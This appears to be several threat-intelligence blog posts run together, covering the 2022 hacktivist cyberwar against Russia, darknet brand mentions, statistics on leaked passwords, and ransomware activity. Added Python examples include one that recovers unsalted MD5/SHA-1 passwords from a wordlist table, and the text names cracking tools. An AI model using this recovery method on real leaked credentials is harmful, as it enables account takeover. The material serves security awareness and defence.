While the kinetic war waged in the physical realm, Ukraine’s Ministry of Digital Transformation turned to the digital realm for assistance. Within days of the invasion, a call across underground forums and chatrooms was placed and hundreds of thousands of volunteers – many who identify with the Anonymous hacktivist collective – answered.
Ukraine’s call for help sparked off the first ever global cyberwar.
Weeks before tanks and soldiers marched on the cities of Ukraine, Russia had already carried out a series of successful cyberattacks against Ukraine, hitting critical infrastructure and financial institutions around the country with at least six unique strains of destructive wiper malware. DarkOwl observed data exfiltrated during some of those attacks surface in the darknet, such as the Free Civilian service on Tor where hundreds of gigabytes of Ukrainian citizens’ sensitive personal data appeared. Recent reporting confirms Russia’s GRU also carried out a massive cyberattack against Viasat, knocking its customers’ KA-SAT satellite broadband offline an hour before the invasion.
Russia’s pre-invasion attacks against Ukraine pale in comparison to the retaliatory cyberattacks launched against Russia by the international hacktivist community over the last 77 days. Since the invasion began, thousands of hacktivists, cybersecurity researchers, pen-testers, and ‘greyhats’ have been actively participating in daily campaigns to disrupt Russia’s military offensive and influence the perceptions of the Russian people trapped behind the walls of the iron curtain.
Cyber Warriors Use Their Keyboards and Phones as Weapons in Global Cyberwar
Ukraine’s Ministry of Digital Transformation has played a large role in mobilizing calls to arms from a digital perspective. The IT Army of Ukraine – a digital army of over 275,000 volunteers tasked by the Ministry – targets Russian websites every day with widespread distributed denial of service (DDoS) attacks. The Ministry also coordinated directly with SpaceX on acquiring thousands of Starlink terminals for redundant satellite Internet access and spearheaded public calls to international business leaders and retail suppliers to withdraw from operating in Russia.
Hacktivist cyber cells aligned with the Anonymous collective and pro-Ukrainian criminal cyber threat actors conducted hundreds of direct information operations campaigns against Russia using any and every exploit in their arsenal. To this day, the attacks continue relentlessly despite Russia’s attempts to use geo-fencing and Cloudflare services.
Within the first week of the war, we witnessed credentials for numerous critical Russian government ministries leaked on the deep web; the names, phone numbers and personal assets of Russian oligarchy released to the public; names, passports, and dates of birth for over 120,000 Russian soldiers deployed in Ukraine; internal documentation for Russia’s Police Force, Ministries of Foreign Affairs, and Economy leaked.
Darknet criminal communities split over their national alliances. Pro-Russian ransomware groups watched their affiliates abandon their programs and turn on them. We witnessed multiple groups have the internal documentation, source code, and private chats leaked. Several Tor forums and vendor markets hosted in Russia faced persecution through direct cyberattacks, database leaks, and deanonymization of IP addresses.
Propaganda as a Weapon
In any cyberwar, information is power. Knowing that Moscow would try to frame the war as a justified and defensive strategic military operation, Anonymous worked immediately to identify facts and combat misinformation. Videos of the attacks against civilian buildings went viral on social media, YouTube, and Discord. Russian television, radio, and streaming services were illegally accessed to share images from Ukraine. Anonymous security specialists from Poland known simply as squad303 spun up their 1920.in service – named after a famous RAF squadron involved in WW2’s Battle of Britain – which allowed strangers to contact a random Russian citizen via SMS, email, WhatsApp, and Viber using leaked lists of millions of Russian citizens’ personal contact information and social media.
As of the first week in May, the squad303 team announced that over 100 million direct messages had been sent using their service.
Figure 1: Screenshot of squad303’s Russian Citizen Phone Number Contact Service
The Kremlin responded by tightening their control on the public media narrative, shutting down social media platforms like Twitter, Instagram, and Facebook, officially calling their war a “special military operation” and using militarized riot police to enforce a strict ban on all forms of public protest of the invasion.
Western media and independent news sources have been threatened with journalists facing a potential 15-year prison sentence for reporting anything that countered Putin’s narrative of “denazification of Ukraine” and “freeing” its people from imminent nuclear threat from the US and NATO. Russian propaganda outlets began recirculating false claims of US-sponsored bioweapon laboratories and nuclear weapon storage facilities across Ukraine to justify the invasion.
Since the invasion, the Russian Internet Research Agency (IRA)-backed ‘troll army’ is in full force with thousands of bot accounts active across Twitter, Facebook, Discord, and Telegram spinning a different story on the ground in Ukraine. The accounts disseminate elaborate storylines of Ukraine shelling their own citizens and supporting fake videos and doctored media.
QAnon and Russian Disinformation
Deep web and darknet imageboards (or “chans”), historically supportive of the QAnon movement and home to the most outrageous conspiracy theories ever told, have also been supportive of Putin, touting his critical international role – like that of former President Trump – in ridding the world of its secret Cabal and the greedy desires of the New World Order.
According to research shared by Bellingcat, posts on the imageboards in early March stated Russia capturing Ukraine’s Chernobyl plant was critical to stopping everything “from DNA experiments, adrenochrome, torture, childsex and rape facilities, cloning installations and much more.” Ironically, QAnon Russia – with one of the largest QAnon follower bases at over 90,000 users – has a dissenting opinion and refuses to share the propaganda, instead promoting peace in Ukraine and a united brotherhood across all nations in the region including Belarus, Russia, and Ukraine.
Anonymous retaliated against these coordinated disinformation efforts by hacking Russia’s Roskomnadzor information and propaganda agency and its All-Russian State Television and Radio Broadcasting Company (VGTRK) and leaking over 900,000 emails and 360,000 files from across the organizations, which detail how television and radio are tightly regulated and programs censored directly by the Kremlin.
In anticipation of Russian propaganda expected to be broadcast on Victory Day on May 9th, Anonymous successfully compromised Russian state television, changing nearly every program description during Victory Day ceremonies to read:
“The blood of thousands of Ukrainians and hundreds of their murdered children is on your hands. TV and authorities are lying. No to war.”
Figure 2: Television Program Description from Russian State TV Programming Hack (Source: Anonymous)
Virtual private network (VPN) use in Russia has skyrocketed increasing over 3,000% since mid-February. According to open sources, at least some percentage of curious Russian citizens are bypassing censorship by using VPNs to access international news about Ukraine and social media platforms. As of this week, reports estimated an average of 300,000 downloads of VPN applications occurred every day.
The first fallout in the darknet from the cyberwar was direct attacks against the CONTI ransomware gang shortly after they publicly declared their support for Russia’s invasion. A Ukrainian-based ‘security researcher’ took to Twitter to leak CONTI’s ransomware source code, details of their internal operations, botnet infrastructure, along with private jabber chats and PII from members of the team.
Similar leaks followed for members of the FSB-backed Trickbot group including dossiers of their members.
Several darknet forums, marketplaces, and XMPP chat servers were taken offline, and information leaked in a digital public shaming for each group’s association with Russia.
In March, Kelvinsecurity exploited a simple IDOR vulnerability on the darknet site: DATABASE Market and leaked the contents of the market’s SQL database and deanonymized the server publishing the IP address of their host located in St. Petersburg.
Earlier this month, a member of Anonymous known as v0g3lsec hacked a Russian-linked darknet vendor shop and replaced the site’s content with a description of squad303’s information service and a link to their surface website.
Figure 3: Tor Service Defacement by v0g3lsec
Network Battalion (nb65) successfully deployed CONTI’s leaked ransomware source code with a modified cipher and has carried out more than half a dozen attacks against targets across Russia. Their most recent attack involved the Qiwi Кошелек (Qiwi Wallet) Russian payment system, with over 149,000 kiosks and terminals around the country. Earlier this week, the group shared a database containing over 7 million unique credit card numbers and associated PII for Qiwi platform users in Russia.
Critical Infrastructure Attacks
We have not observed a mass disruption of Russia’s critical infrastructure such as gas, power, and water supplies. This is likely because, as in the US, such systems are decentralized and distributed across various districts of the country. However, some limited interruption has been observed during the conflict. In early March, Cyber Partisans used industrial control system (ICS) attacks to shut down train lines supplying the Russian military in Belarus. Automated ticketing stations were knocked offline, forcing the transportation authorities to issue paper tickets and causing delays.
Oil and gas related entities in Russia such as Gazprom Linde, MashOil, Neocom Geoservice, Enerpred, Aerogas, and Technotec have all suffered cyberattacks resulting in thousands of internal Microsoft Exchange emails being leaked in the deep web. In late April multiple explosions occurred at the Druzhba oil depot, resulting in catastrophic fires and injuries. Subsequent open-source reports on Telegram suggest that the explosions at the Transneft-Druzhba oil depot, a supplier for military units, were ‘delivered with the help of drones’ from Ukraine. The depot and associated pipeline is the main route for getting Russian oil to its European customers, although EU leaders have signaled a plan to stop purchasing oil from Russia by the end of the year, which may lead to a full embargo across the continent.
In recent weeks, several other mysterious fires across the country have been reported, including an ammunition depot in Staraya, another ammunition plant in the Russian town of Perm, an aviation school in the same town of Perm, a government building in Korolev, a chemical plant near the border with Ukraine, an oil depot in Belgorod, a defense research center in Tver, a pro-Kremlin publishing house in Moscow, a storage hangar in the Bogorodskoe district, and oil tanks set on fire in the industrial zone of Nizhny Novgorod.
Another random fire also started in Belgorod less than two days ago. Reports have not specified where exactly the fire originated.
Figure 4: Recent Explosions in Belgorod Captured by Social Media Users (Source: VK)
It is unclear from reporting whether these explosions were a result of SCADA cyberattacks or direct arson and sabotage by Russian locals sympathetic with the situation in Ukraine. The darknet threat group GhostSec recently compromised Russia’s Metrospetstekhnika ASOTP system for transportation and successfully caused dozens of trains connected to the system to cease operation. The group claims they were able to access and disrupt the internal temperature, smoke, and backup battery systems for any of the trains connected to the network.
Figure 5: Announcement of Metro Train Attack by GhostSec (Source: Telegram)
Anonymous Leaks Stolen Data
Within days of the invasion, targeting data and exfiltrated data from targets across Russia surfaced in the deep web. DarkOwl has been monitoring mentions and announcements of data leaked in relation to the conflict since the start of the cyberwar and found hundreds of leaks related to numerous government and commercial industrial sectors across Russia, Belarus, and China. The chart below demonstrates the volume of unique URLs observed containing information related to the war. In the early days, much of the leaked information consisted of network reconnaissance information (IP addresses, domains, credentials) for carrying out attacks against critical targets, and PII for government, military, and citizens of Russia.
Figure 6: Distribution of Daily Data Leaks Related to Global Cyberwar
As the war progressed, stolen data of all kinds, e.g. intellectual property, design schematics, military plans, financial account data, and emails, appeared. While in recent weeks the number of unique leaks is smaller, the contents contained therein are higher in volume and more significant in value. For example, over the last two weeks, Anonymous has released – via DDoSecrets – over 3TB of data archives containing thousands of emails and sensitive internal documents from victim organizations across Russia.
Figure 7: Distribution of Data Leaks from the Cyberwar by Industry Sector
Nearly 90% of the leaks DarkOwl has observed are related to targets in Russia. The figure below is a distribution of the non-Russian countries whose information has surfaced with direct mention of the cyberwar. The threat actor group AgainstTheWest (ATW) concentrated on technology, government, and financial targets across China in the weeks following the invasion. ATW has since stopped participating in the campaign.
Figure 8: Percentage of non-Russian Data Leaked with Direct Mention of Global Cyberwar
Russia’s Response Takes Many Forms
Readers should not be fooled into thinking that this data means that Russia is sitting back idly during these attacks. In addition to the crippling Viasat attack on the day of the invasion and widespread propaganda dissemination, GRU-affiliated cyber actors have regularly attacked Ukrainian telecommunications and critical infrastructure alongside its ground-based offensives. Elon Musk also recently stated that Starlink satellites in use by the Ukrainian government for Internet broadband access are under frequent targeted signal jamming by Russian-linked hackers.
State-sponsored malicious cyber actors, ransomware and affiliated extortion groups linked to Moscow continue to spray US and western European companies with widespread spear-phishing attacks and malware deployment. During our recent review, we estimate ransomware gangs successfully encrypt on average a dozen organizations per day.
DarkOwl will continue to monitor the darknet and deep web for critical information pertaining to the quickly evolving cyber landscape.
This blog discusses how DarkOwl’s software-as-a-service (SaaS) product suite – Vision App, Search API, and Entity API, can be utilized to protect corporate brand reputation and value.
Darknet Background
The darknet – also referred to as the dark web – is a segment of the Internet, hidden from the novice user, that is only accessible by using specialized software or network proxies. Due to the inherently anonymous and privacy-centric nature of the darknet, it facilitates a complex ecosystem of cybercrime and illicit trade in goods and services. The most common darknet to date is “The Onion Router” or simply, Tor.
The deep web is a collection of websites that do not require anonymization software to access but require unique knowledge of the URL or account curation and authentication for entrance. While a personal banking account portal is technically in the deep web, much of the deep web facilitates cybercrime through criminal marketplaces and discussion forums.
DarkOwl defines darknet-adjacent networks, such as servers and channels from Telegram, IRC, and Discord as instant-messaging chat platforms featuring real-time communications (or “chatter”) of on-going criminal activity and active cyber operations.
Decentralized Darknet Marketplaces
The darknet is home to decentralized darknet marketplaces (DNM), e-commerce platforms where buyers and sellers transact directly with each other through peer-to-peer networks or the Tor network. Marketplaces usually employ cryptocurrency-based escrow built into the marketplace to facilitate secure and anonymous deals between the buyers and vendors.
One of the first and most well-known darknet marketplaces is the Silk Road, established in 2012 by its founder, “Dread Pirate Roberts” – Ross Ulbricht. Upon its shutdown and for years after, the US government seized an estimated $1 billion USD in Bitcoin connected to Silk Road.
The seizure of Silk Road and the life sentence of Ulbricht have not deterred criminals from continued illicit goods trade in the darknet. As of the time of writing, DarkOwl has knowledge of 30 large-scale decentralized markets currently online and hundreds of smaller single-vendor or single-product marketplaces in operation across the darknet and deep web.
Forms of Brand Mentions in the Darknet
Corporations and organizations, along with their key leadership, are regularly targeted and ‘mentioned’ in the darknet – across marketplaces, discussion forums, and transient paste sites. Many times the references are specific to a cyber campaign targeting the company, while others are perfectly matched counterfeit goods marketed by underground counterfeiters and resold on darknet decentralized marketplaces.
The most common types of critical brand mentions in the darknet include:
Derogatory Mention by a Disgruntled Customer or Employee
Personal Dox of Corporate Leadership and/or Board Members
Targeting Data in association with Malicious Cyber Operations
Leaked Critical Company Data
Cracked Software Distribution
Pirated Media and Streams
Counterfeit Product Sales
Examples of Corporate Brand Mentions in Vision
Using the common forms listed above, this section provides real examples of brand mentions in the darknet, deep web, and darknet-adjacent platforms captured by DarkOwl’s autonomous content crawlers.
A disgruntled employee of Wells Fargo states that the company is ‘scandalous’ and ‘corrupt.’ They also highlight a major cyber risk for the company: they have been instructed to use other employees’ logins to do their job.
A dox (also doxx) is a detailed public record of someone’s identity. To ‘dox’ someone is to publish private information about that person – as a form of public shaming, generated to enact revenge on the company or person for some perceived wrongdoing. A dox presents a significant security threat to the company and the individual, with detailed information such as mobile phone numbers, residential address, social media accounts, bank accounts, and familial associations publicized and subsequently targeted for phishing, fraud, and even kidnapping, murder, or extortion.
Every ‘dox’ has a reason for publishing the information to a public record.
Corporate leadership, members of the board of directors, and key figures related to many brands and international entities are regularly targeted for ‘doxing’ in the darknet.
Threat actors identify Gazprom’s subdirectories, subdomains, and IP addresses in preparation for a concerted attack against the oil and gas supplier in retaliation for Russia’s invasion in Ukraine.
Less than a month later, a significant volume of data from Gazprom and its subsidiary, Gazprom Linde Engineering was leaked on the darknet including 768,000 emails from the joint Gazprom-Linde Microsoft Exchange server.
Hacktivists regularly target companies and brands in support of geopolitical and social injustice initiatives.
The image below includes an announcement on Telegram by pro-Ukrainian hackers calling for the boycott of purchasing Nestle products due to their continued operation in Russia and subsequent economic support for the Putin-backed Kremlin.
In the days following the post on Telegram, prominent darknet threat actor group, KelvinSec compromised Nestle’s company network and leaked sensitive databases containing their customers, transaction, and shipping data.
Figure 6: Screenshot from the actual database leaked from Nestle, consisting of customer entity data, orders, payment information, and passwords (10GB total)
Cybercriminals often leak large sets of company-proprietary and sensitive data obtained via ransomware attack or malware infection of a company’s network. Critical corporate data might include – but is not limited to – software source code, sensitive email communications, employee W2 verification data, identity documents such as driver’s licenses and passport images, and financial statements.
“Cracking” is a broad term used by darknet and deep web threat actors to describe the process of breaking into something, more often bypassing software licenses and passwords required by computer software programs.
Adobe products are regularly targeted for ‘cracking’ due to the steep costs of their software licenses and subscriptions. Threat actors on Telegram detail how to install a ‘cracked’ version of Photoshop and use DLL manipulation to override licensing requirements.
Pirated media, movies, and streams have a continued presence on the darknet. The Pirate Bay – considered the “most resilient BitTorrent site” on the Internet – still circulates the latest movie titles.
Figure 10: The Pirate Bay BitTorrent Download Landing Page
The illicit trade of counterfeit goods is a multi-billion-dollar international industry – which continues to be led by China. According to Europol, surface web monitoring helps crack down on the major counterfeit goods suppliers, but many sophisticated networks simply shift to the darknet and use decentralized darknet markets to sell their counterfeited items.
Many darknet marketplaces feature a “counterfeit goods” section that encompasses physical counterfeited items a buyer can purchase and have sent to them directly. Watches and fine jewelry are the most common physical goods offered on underground marketplaces.
Figure 11: Active Listing for a Counterfeit Ladies’ Panthere de Cartier Watch on Vice City
Marketplaces are more commonly known for their diverse and extensive selection of drugs available for purchase. DarkOwl has witnessed the defamation of many brands in affiliation with common street drugs.
For example, the Warner Bros (WB) entertainment brand has been extensively used by drug dealers on the darknet in the advertisement of “WB-shaped” ecstasy (XTC) pills and their comic-book heroes and cartoon franchises exploited in the distribution of marketed Batman, Superman, and Looney Toons-specific drugs.
Figure 12: Screenshot of Offer Captured in DarkOwl Vision DocID: 1411b1671a1aeedae7c1add5b996d769
DarkOwl Solutions for Brand and Reputation Management
DarkOwl’s SaaS product suite of its Vision App, Search API, and Entity API are designed to help augment surface web monitoring for brand mentions like those discussed and outlined in this document.
In the Vision App, analysts can create automated monitors and alerts to notify them when critical corporate information or counterfeited products are circulated on darknet paste sites, discussion forums, or marketplaces.
Figure 14: Screenshot from DarkOwl Vision’s Search, Monitoring, and Alert Features
In honor of World Password Day – a date established in 2013 by Intel Corporation to foster security awareness – the content team at DarkOwl decided to compile some interesting statistics based on the email and password entities available in the DarkOwl Entity API.
DarkOwl’s Entity Volume
Every day we hear of another commercial data or app breach. At this point, everyone can assume their email address and/or password has been leaked on the darknet or deep web. DarkOwl has collected and tokenized over 8.68 billion (with a “B”) email addresses. 5.46 billion of those emails include a password. 57% of those email addresses include a ‘plaintext’ or legible password.
But My Password is Complex!
If you’re still using your cat’s name followed by the exclamation point (“Fritzie!”), your password is not complex, and you have most likely already experienced an account compromise. But, you’re not alone. Complex, lengthy passwords are not the norm across DarkOwl’s data.
The most common password length is 8 characters.
Figure 1: Distribution of Password Volume by Password Character Length
Is an 8-character length password strong enough?
The strength of an 8-character password depends on the motivation and the tools available to the cybercriminal targeting your account. There are plenty of password ‘cracking’ tools readily available to hackers for conducting dictionary and brute force style password attacks. Some of the most popular tools include:
John the Ripper
Cain & Abel
OphCrack
THC Hydra
Hashcat
Brutus
RainbowCrack
CrackStation
Even the most sophisticated password crackers will need significant processing power and time to successfully break long, complex passwords. Unless an 8-character password includes numbers and symbols, the password can be potentially brute forced.
Figure 2: Time to Crack Passwords of Varying Degrees of Character Length and Complexity
Over 4 billion of the passwords (4,285,451,030) available in DarkOwl’s Entity API are 32 characters or less. 662,341,057 passwords could be classified as extreme and greater than 32 characters in length.
Figure 2 demonstrates that passwords including numbers and symbols are harder to crack than letters alone. DarkOwl’s data contains a significant volume of passwords with some degree of complexity but only 637 million plaintext passwords would be classified as “strong.”
Strong passwords are defined here as containing special characters, digits, lowercase and uppercase letters, and being greater than 8 characters in length.
Passwords That Age Us
Do you have a favorite year that you include in your password for uniqueness? Perhaps it’s your birth year or anniversary. Both are very common. We found over 707 million passwords that include a year string starting with “19XX” or “20YY.”
According to our data distribution, peak volumes of passwords include a date in the range of 1980 to 1994. The most frequent years we observed were:
1990: 14,006,141
1987: 13,795,566
Figure 3: Distribution of Passwords Containing a Date (Year) String
QWERTY is Simply Lazy
The “QWERTY” keyboard layout originated in the late 1860s and was designed to help people type and translate Morse code faster. Regardless of its origins, people heavily rely on the top row of the American keyboard in many password fields; 5,793,906 passwords in the DarkOwl Entity API contain the 6-character string “qwerty.”
Even worse is sequential numbers with 29,010,394 consisting of “123456” and 11,718,471 going to the trouble to add the whole number set, “123456789.”
DarkOwl has collected 5,857,363 passwords using the laziest password of all: the word, “password.”
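To make the measurements in the sections above concrete, here is an added example (not DarkOwl’s code, and not run over DarkOwl’s data) that computes the same statistics over a small constructed list of plaintext passwords using the page’s own definitions: the length distribution, the “strong” definition (special character, digit, lowercase, uppercase, more than 8 characters), embedded “19XX”/“20YY” year strings, and the lazy strings “qwerty”, “123456”, “123456789” and “password”. The sample passwords are invented for the example.

```python
"""
Added example: password-hygiene statistics over a constructed sample, using the
definitions given in the text. Sample passwords are invented, not leaked data.
"""
import re
import string
from collections import Counter
from typing import Dict, List, Optional

# Constructed sample passwords; none come from a real leak.
SAMPLE_PASSWORDS = [
    "Fritzie!", "Fritzie!1990", "qwerty123", "123456", "123456789",
    "password", "Password1987", "Tr0ub4dor&3", "correct horse battery staple",
    "X7#pLm!qR2vZ", "summer2015", "abc12345", "Summer22",
]

YEAR_RE = re.compile(r"(?:19|20)\d\d")           # "19XX" or "20YY" anywhere in the string
# Longest forms first so "123456789" is not reported as plain "123456".
LAZY_STRINGS = ("qwerty", "123456789", "123456", "password")


def length_distribution(pws: List[str]) -> Counter:
    """Counter of password length -> number of passwords with that length."""
    return Counter(len(p) for p in pws)


def is_strong(pw: str) -> bool:
    """The page's definition: specials + digits + lower + upper, and longer than 8."""
    return (len(pw) > 8
            and any(c in string.punctuation for c in pw)
            and any(c.isdigit() for c in pw)
            and any(c.islower() for c in pw)
            and any(c.isupper() for c in pw))


def years_in(pw: str) -> List[str]:
    """All four-digit year strings starting with 19 or 20 found in the password."""
    return YEAR_RE.findall(pw)


def lazy_string(pw: str) -> Optional[str]:
    """First lazy substring found (case-insensitive), or None."""
    low = pw.lower()
    for s in LAZY_STRINGS:
        if s in low:
            return s
    return None


def summarize(pws: List[str]) -> Dict[str, object]:
    lengths = length_distribution(pws)
    year_counts: Counter = Counter()
    with_year = 0
    for p in pws:
        ys = years_in(p)
        if ys:
            with_year += 1
            year_counts.update(ys)
    lazy_counts = Counter(s for s in (lazy_string(p) for p in pws) if s)
    return {
        "total": len(pws),
        "most_common_length": lengths.most_common(1)[0][0],
        "length_distribution": lengths,
        "strong": sum(is_strong(p) for p in pws),
        "with_year": with_year,
        "year_counts": year_counts,
        "lazy_counts": lazy_counts,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_PASSWORDS).items():
        print(f"{key}: {value}")
```

Note that the page’s “strong” definition is a minimum bar, not the 16-character recommendation given later in the tips: a 12-character password with all four character classes counts as strong here, while “correct horse battery staple” does not because it has no digit or special character, which is a limitation of character-class rules rather than of that passphrase.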
Hashed Passwords > Plaintext
Billions of leaked plaintext passwords are tragic, no matter the complexity, character length, or whether a date string or qwerty is included. Therefore, if you suspect a plaintext password you use or have used in a commercial webservice has been compromised, change it immediately and cease using it on any authentication logins. Credential stuffing campaigns exploit password reuse and utilize email address and password combinations to attempt logins outside of the source of the original leak.
6% (518,566,724) of the passwords available in DarkOwl’s Entity API are hashed passwords.
In cryptography, hashing uses a mathematical algorithm to map data of any size to a bit string of a fixed size. In password hashing, the ‘hash’ is a fixed-size digital fingerprint of the original plaintext password that cannot be directly reversed to recover it. Several different ‘hashing algorithms’ are available for hashing passwords.
The most common hash in DarkOwl’s data is MD5 followed by SHA-1.
Some MD5 hashes in phpBB and WordPress appear as 34 characters instead of 32. DarkOwl has 345,431 hashed passwords consisting of 34 characters.
Both MD5 and SHA-1 have been deemed vulnerable, as they are subject to collision attacks and to ‘dehashing’ (recovery of the plaintext). One of the most popular password-cracking programs to date, Hashcat, supports popular wordlists like RockYou, allowing the original plaintext password to be recovered.
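The two points above (the 32/34/40-character formats a leak triager sees, and why an unsalted fast hash is recovered as soon as the plaintext is in a wordlist) can be shown in a few lines. The block below is an added example, not DarkOwl code; the “dump” records and the five-word wordlist are constructed stand-ins for a leak and for RockYou, and the PBKDF2 parameters are an assumption chosen for illustration rather than a recommendation from the article.

```python
import hashlib
import hmac
import os
import re

# Format signatures as they appear in leaked dumps.
MD5_HEX = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)
SHA1_HEX = re.compile(r"^[0-9a-f]{40}$", re.IGNORECASE)
# phpass "portable" hash (phpBB3 / WordPress): "$P$" or "$H$" + 31 chars = 34 characters total.
PHPASS = re.compile(r"^\$[PH]\$[./0-9A-Za-z]{31}$")
BCRYPT = re.compile(r"^\$2[aby]\$\d{2}\$[./0-9A-Za-z]{53}$")

# Constructed stand-in for a wordlist such as RockYou.
WORDLIST = ["123456", "password", "qwerty", "1990", "letmein"]


def classify_hash(value: str) -> str:
    """Label a stored password value by its on-disk format (triage step over a leak)."""
    if MD5_HEX.match(value):
        return "md5"
    if SHA1_HEX.match(value):
        return "sha1"
    if PHPASS.match(value):
        return "phpass"
    if BCRYPT.match(value):
        return "bcrypt"
    return "unknown"


def build_lookup(words, algo: str) -> dict:
    """Precompute hash -> plaintext for an unsalted algorithm; one table serves every leak."""
    return {hashlib.new(algo, w.encode()).hexdigest(): w for w in words}


def triage(records, wordlist=WORDLIST):
    """Count formats and, for unsalted MD5/SHA-1, match each value against the wordlist table.
    Returns (counts_by_format, recovered) where recovered maps hash -> plaintext."""
    tables = {"md5": build_lookup(wordlist, "md5"), "sha1": build_lookup(wordlist, "sha1")}
    counts, recovered = {}, {}
    for value in records:
        kind = classify_hash(value)
        counts[kind] = counts.get(kind, 0) + 1
        if kind in tables and value.lower() in tables[kind]:
            recovered[value] = tables[kind][value.lower()]
    return counts, recovered


# Contrast: a salted, iterated hash. Two users with the same password get different
# stored values, and a precomputed table cannot be reused across salts.
def hash_password_pbkdf2(password: str, salt: bytes = None, iterations: int = 200_000) -> str:
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex() + "$" + dk.hex()


def verify_pbkdf2(password: str, stored: str, iterations: int = 200_000) -> bool:
    salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), iterations)
    return hmac.compare_digest(dk.hex(), dk_hex)


# Constructed sample dump: two unsalted hashes of throwaway passwords, a placeholder phpass
# string and bcrypt string (shape only, not real hashes), and one PBKDF2 value.
SAMPLE_DUMP = [
    hashlib.md5(b"password").hexdigest(),
    hashlib.sha1(b"123456").hexdigest(),
    "$P$B" + "a" * 30,
    "$2b$12$" + "a" * 53,
    hash_password_pbkdf2("password", salt=bytes(16)),
]

if __name__ == "__main__":
    counts, recovered = triage(SAMPLE_DUMP)
    print(counts)
    for h, plain in recovered.items():
        print(f"{classify_hash(h)} {h} -> {plain!r}")
```

Running the block shows both unsalted values recovered instantly from the five-word table, while the PBKDF2 record is neither classifiable by length alone nor matched without repeating the salted computation per record.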
Password Strengthening Tips
Although you can’t prevent commercial services from getting breached and usernames, email addresses, and password combinations from getting leaked, you can follow some simple steps to ensure you employ robust password hygiene and reduce the risk of a password getting brute forced or exploited in a credential stuffing campaign.
Use an automated complex password manager like LastPass, Bitwarden, or 1Password.
Don’t reuse passwords. Have a unique password for every login and streaming service you sign up for.
Choose passwords at least 16 characters in length.
Include symbols and numbers for increased complexity.
Avoid using passwords with dictionary words or names.
Don’t use sequential numbers or the word “password.”
Don’t use the year of your birth or anniversary in your password.
Turn on multi-factor authentication (MFA) for important accounts like financial and banking sites.
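The “strong” definition from Figure 2 and the weak habits catalogued above (year strings, “qwerty,” sequential numbers, the word “password,” dictionary words, short length) can be turned into a small self-check that runs over a password list locally. This is an added example, not DarkOwl code; the four-word dictionary and the sample passwords are constructed for illustration, and the 16-character threshold follows the tip above rather than the figure’s definition.

```python
import re

YEAR_RE = re.compile(r"(19|20)\d\d")          # "19XX" / "20YY" strings from the distribution above
SEQUENTIAL = ("123456", "123456789")
SPECIALS = set("!@#$%^&*()-_=+[]{};:'\",.<>/?\\|`~")
# Constructed stand-in for a dictionary / names list.
DICTIONARY = {"summer", "winter", "dragon", "monkey"}


def is_strong(pw: str) -> bool:
    """Figure 2's definition: special char, digit, lowercase, uppercase, length > 8."""
    return (len(pw) > 8
            and any(c.isdigit() for c in pw)
            and any(c.islower() for c in pw)
            and any(c.isupper() for c in pw)
            and any(c in SPECIALS for c in pw))


def weak_patterns(pw: str) -> list:
    """Return the weak habits present, in a fixed order so results are comparable."""
    found = []
    lowered = pw.lower()
    if YEAR_RE.search(pw):
        found.append("year")
    if "qwerty" in lowered:
        found.append("qwerty")
    if any(seq in pw for seq in SEQUENTIAL):
        found.append("sequential")
    if "password" in lowered:
        found.append("password")
    if any(word in lowered for word in DICTIONARY):
        found.append("dictionary")
    return found


def assess(pw: str) -> dict:
    """Combine the strength definition, the 16-character tip and the pattern checks."""
    return {
        "strong": is_strong(pw),
        "meets_16": len(pw) >= 16,
        "patterns": weak_patterns(pw),
    }


def summarize(passwords) -> dict:
    """Aggregate counts in the style of the article's statistics, over a local list."""
    out = {"total": 0, "strong": 0, "meets_16": 0,
           "year": 0, "qwerty": 0, "sequential": 0, "password": 0, "dictionary": 0}
    for pw in passwords:
        result = assess(pw)
        out["total"] += 1
        out["strong"] += result["strong"]
        out["meets_16"] += result["meets_16"]
        for p in result["patterns"]:
            out[p] += 1
    return out


# Constructed sample list (not leaked data).
SAMPLE = ["Summer1990!", "password123", "qwerty123456", "Tr0ub4dor&3x", "correct-Horse-battery-staple9"]

if __name__ == "__main__":
    for pw in SAMPLE:
        print(f"{pw!r:32} {assess(pw)}")
    print(summarize(SAMPLE))
```

A password can satisfy the figure’s “strong” definition and still carry one of the habits the article warns about (“Summer1990!” is classed strong but flags both a year and a dictionary word), which is why the checker reports the two separately.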
Celebrating World Password Day
Today’s World Password Day is a perfect time to pause and review the security – or lack thereof – of your most common password habits. After reading this blog, we invite you to consider taking the following actions today:
Review passwords stored in your keychain, password managers, or sticky notes.
Change any passwords you might be reusing across multiple sites.
Share password tips on social media with friends and family (#WorldPasswordDay).
Transform a weak password into a strong one using the password strengthening tips above.
Turn on MFA for all important accounts.
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.
In the days immediately following the invasion of Ukraine, the ransomware-as-a-service (RaaS) industry on the darknet experienced several high-profile interruptions with many popular RaaS affiliate programs impacted by their partners having to choose between their nationalistic alliances with Russia or Ukraine. Many wondered what impact this would have on the thriving ransomware ecosystem.
A security researcher leaked critical operational data, personally identifying information for threat actors, and sensitive private chats between members of the CONTI RaaS group. The data leak revealed the human side of some of the most prominent RaaS organizations with mentions of personal “visits to the dentist” and recommended songs to listen to on YouTube to pass the time while working on their exploit and attack campaigns.
From an operations perspective, we also learned the critical roles Bazarloader Botnet, Cobalt Strike, and Trickbot played in the long-term success of CONTI’s empire.
Shortly after the leaks emerged, CONTI’s leak site slowed in announcing victims from 10 through 16 March. However, during that same time STORMOUS announced they had compromised Ukraine’s Ministry of Foreign Affairs. Around the same time, Ukraine’s Vodafone network suffered a major cyberattack and was knocked offline.
The interruption in victim announcements was more of a slow-down and did not last long; the major RaaS industry players CONTI, Lockbit 2, and CL0P quickly ramped up again, announcing dozens of victims during the month of April.
LockBit2 – a gang that “claimed” neutrality in the Russian-Ukraine war – has the highest number of total victims since the 24th of February at 280. That’s an average of 4.5 victims per day by a single group.
DarkOwl is currently tracking 25 active ransomware groups. Across those groups, the total number of victims – just since 24 February – totals 813, presenting an even more worrisome average of 11.8 victims per day.
Figure 2: Scatter plot distribution of daily ransomware victims per RaaS gang
Critical Infrastructure Targeted
Unsurprisingly, victims include several US and NATO-based critical infrastructure organizations and suppliers including local government municipalities, electrical and alternative power providers, water, telecommunications, and transportation suppliers.
